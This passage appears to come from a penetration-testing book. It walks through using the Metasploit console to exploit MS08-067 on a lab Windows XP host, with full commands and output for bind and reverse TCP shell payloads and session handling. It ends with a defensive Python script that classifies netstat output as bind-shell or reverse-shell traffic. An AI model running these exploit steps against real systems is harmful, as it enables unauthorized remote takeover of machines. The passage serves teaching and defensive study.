Using the Metasploit Console to Launch Exploits
Our first Metasploit demo involves exploiting the MS08-067 Windows XP vulnerability that led to the Conficker superworm of late 2008–early 2009. We’ll use Metasploit to get a remote command shell running on the unpatched Windows XP machine. Metasploit can pair any Windows exploit with any Windows payload. So, we can choose the MS08-067 vulnerability to open a command shell, create an administrator, start a remote VNC session, or do a bunch of other stuff discussed later in the chapter. Let’s get started.
$ ./msfconsole

[Metasploit ASCII-art banner]

       =[ metasploit v3.4.0-dev [core:3.4 api:1.0]
+ -- --=[ 317 exploits - 93 auxiliary
+ -- --=[ 216 payloads - 20 encoders - 6 nops
       =[ svn r9114 updated today (2010.04.20)

msf >
The interesting commands to start with are:

show <exploits | payloads>
info <exploit | payload> <name>
use <exploit-name>
You’ll find all the other commands by typing help or ?. To launch an MS08-067 exploit, we’ll first need to find the Metasploit name for this exploit. We can use the search command to do so:
msf > search ms08-067
[*] Searching loaded modules for pattern 'ms08-067'...

Exploits
========

   Name                          Rank   Description
   ----                          ----   -----------
   windows/smb/ms08_067_netapi   great  Microsoft Server Service Relative Path Stack Corruption
The Metasploit name for this exploit is windows/smb/ms08_067_netapi. We’ll use that exploit and then go looking for all the options needed to make the exploit work:
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >
Notice that the prompt changes to enter “exploit mode” when you use an exploit module. Any options or variables you set while configuring this exploit will be retained so that you don’t have to reset the options every time you run it. You can get back to the original launch state at the main console by issuing the back command:
msf exploit(ms08_067_netapi) > back
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >
Different exploits have different options. Let’s see what options need to be set to make the MS08-067 exploit work:
msf exploit(ms08_067_netapi) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
This exploit requires a target address, the port number on which SMB (Server Message Block) listens, and the name of the pipe exposing this functionality:
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.6
RHOST => 192.168.1.6
As you can see, the syntax to set an option is as follows:
set <OPTION-NAME> <option>
Note
Earlier versions of Metasploit were particular about the case of the option name and option, so examples in this chapter always use uppercase if the option is listed in uppercase.
With the exploit module set, we next need to set the payload. The payload is the action that happens after the vulnerability is exploited. It’s like choosing how you want to interact with the compromised machine if the vulnerability is triggered successfully. For this first example, let’s use a payload that simply opens a command shell listening on a TCP port:
msf exploit(ms08_067_netapi) > search "Windows Command Shell"
[*] Searching loaded modules for pattern 'Windows Command Shell'...

Compatible Payloads
===================

   Name                                Rank    Description
   ----                                ----    -----------
   windows/shell/bind_ipv6_tcp         normal  Windows Command Shell, Bind TCP Stager (IPv6)
   windows/shell/bind_nonx_tcp         normal  Windows Command Shell, Bind TCP Stager (No NX Support)
   windows/shell/bind_tcp              normal  Windows Command Shell, Bind TCP Stager
   windows/shell/reverse_ipv6_tcp      normal  Windows Command Shell, Reverse TCP Stager (IPv6)
   windows/shell/reverse_nonx_tcp      normal  Windows Command Shell, Reverse TCP Stager (No NX Support)
   windows/shell/reverse_ord_tcp       normal  Windows Command Shell, Reverse Ordinal TCP Stager
   windows/shell/reverse_tcp           normal  Windows Command Shell, Reverse TCP Stager
   windows/shell/reverse_tcp_allports  normal  Windows Command Shell, Reverse All-Port TCP Stager
   windows/shell/reverse_tcp_dns       normal  Windows Command Shell, Reverse TCP Stager (DNS)
   windows/shell_bind_tcp              normal  Windows Command Shell, Bind TCP Inline
   windows/shell_reverse_tcp           normal  Windows Command Shell, Reverse TCP Inline
In typical gratuitous Metasploit style, there are 11 payloads that provide a Windows command shell. Some open a listener on the host, some cause the host to “phone home” to the attacking workstation, some use IPv6, some set up the command shell in one network roundtrip (“inline”), while others utilize multiple roundtrips (“staged”). One even connects back to the attacker tunneled over DNS. This Windows XP target virtual machine does not have a firewall enabled, so we’ll use the simple windows/shell/bind_tcp payload:
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/bind_tcp
If the target were running a firewall, we might instead choose a payload that would cause the compromised workstation to connect back to the attacker (“reverse”):
msf exploit(ms08_067_netapi) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.6      yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/shell/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The local port
   RHOST     192.168.1.6      no        The target address
By default, this payload will open a listener on TCP port 4444, allowing us to connect for the command shell. Let’s attempt the exploit:
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (240 bytes) to 192.168.1.6
[*] Command shell session 1 opened (192.168.1.4:49623 -> 192.168.1.6:4444)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>echo w00t!
echo w00t!
w00t!
It worked! We can verify the connection by issuing the netstat command from the Windows XP machine console, looking for established connections on port 4444:
C:\>netstat -ano | findstr 4444 | findstr ESTABLISHED
  TCP    192.168.1.6:4444       192.168.1.4:49623      ESTABLISHED     964
Referring back to the Metasploit output, the exploit attempt originated from 192.168.1.4:49623, matching the output we see in netstat. Let’s try a different payload. Press CTRL-Z to put this session into the background:
C:\>^Z
Background session 1? [y/N]  y
msf exploit(ms08_067_netapi) >
Now set the payload to windows/shell/reverse_tcp, the reverse shell that we discovered:
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.6      yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LHOST                      yes       The local address
   LPORT     4444             yes       The local port
This payload requires an additional option, LHOST. The victim needs to know to which host to connect when the exploit is successful.
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.4
LHOST => 192.168.1.4
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.4:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (240 bytes) to 192.168.1.6
[*] Command shell session 2 opened (192.168.1.4:4444 -> 192.168.1.6:1180)

(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>echo w00t!
echo w00t!
w00t!
Notice that this is “session 2.” Press CTRL-Z to put this session in the background and go back to the Metasploit prompt. Then, issue the command sessions -l to list all active sessions:
Background session 2? [y/N]  y
msf exploit(ms08_067_netapi) > sessions -l

Active sessions
===============

  Id  Type   Information                              Connection
  --  ----   -----------                              ----------
  1   shell                                           192.168.1.4:49623 -> 192.168.1.6:4444
  2   shell  Microsoft Windows XP [Version 5.1.2600]  192.168.1.4:4444 -> 192.168.1.6:1180
It’s easy to bounce back and forth between these two sessions. Just use sessions -i <session>. If you don’t get a prompt immediately, try pressing ENTER.
msf exploit(ms08_067_netapi) > sessions -i 1
[*] Starting interaction with 1...

C:\>^Z
Background session 1? [y/N]  y
msf exploit(ms08_067_netapi) > sessions -i 2
[*] Starting interaction with 2...

C:\WINDOWS\system32>
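From the victim's side, the two sessions above leave opposite traces in netstat -ano: the bind shell (session 1) shows a remote peer connected to a local listener on 4444, while the reverse shell (session 2) shows the victim itself connected out to the attacker's 4444. The script below is an added example, not the book's code, that parses constructed netstat -ano output for both cases and classifies each established connection; the port watch list and the PID values are assumptions for the sample.

```python
"""Classify netstat -ano output (Windows) into bind-shell vs reverse-shell indicators."""
import re
from collections import namedtuple

# One netstat -ano TCP row: proto, local addr:port, foreign addr:port, state, pid.
NETSTAT_RE = re.compile(
    r"^\s*(TCP)\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\S+)\s+(\d+)\s*$")
Conn = namedtuple("Conn", "proto laddr lport raddr rport state pid")

# Constructed sample: the victim 192.168.1.6 while both sessions from the text are
# open. Row 2 mirrors session 1 (bind), row 3 mirrors session 2 (reverse). PID 964
# is taken from the text for session 1 and assumed to be the same for session 2.
SAMPLE = """
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    192.168.1.6:4444       192.168.1.4:49623      ESTABLISHED     964
  TCP    192.168.1.6:1180       192.168.1.4:4444       ESTABLISHED     964
  TCP    192.168.1.6:139        0.0.0.0:0              LISTENING       4
"""

# Assumed watch list: the default LPORT used by the shell payloads in the text.
SUSPECT_PORTS = {4444}


def parse(text):
    """Turn raw netstat -ano text into Conn records, skipping header/UDP rows."""
    conns = []
    for line in text.splitlines():
        m = NETSTAT_RE.match(line)
        if m:
            proto, la, lp, ra, rp, state, pid = m.groups()
            conns.append(Conn(proto, la, int(lp), ra, int(rp), state, int(pid)))
    return conns


def classify(conn):
    """Return 'bind', 'reverse', or None for one connection record."""
    if conn.state != "ESTABLISHED":
        return None
    if conn.lport in SUSPECT_PORTS:   # peer connected in to our listener
        return "bind"
    if conn.rport in SUSPECT_PORTS:   # we connected out to the peer's listener
        return "reverse"
    return None


def find_shells(text):
    """List (pid, kind, peer) for every suspect established connection."""
    hits = []
    for c in parse(text):
        kind = classify(c)
        if kind:
            hits.append((c.pid, kind, f"{c.raddr}:{c.rport}"))
    return hits
```

A port watch list is a weak indicator on its own, since LPORT is a free choice for the operator; the PID column is the more durable clue, because the Server service's svchost.exe should not own any connection to a workstation, so correlate the PID with tasklist /svc rather than relying on the port alone.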
You now know the most important Metasploit console commands and understand the basic exploit-launching process. Next, we’ll explore other ways to use Metasploit in the penetration testing process.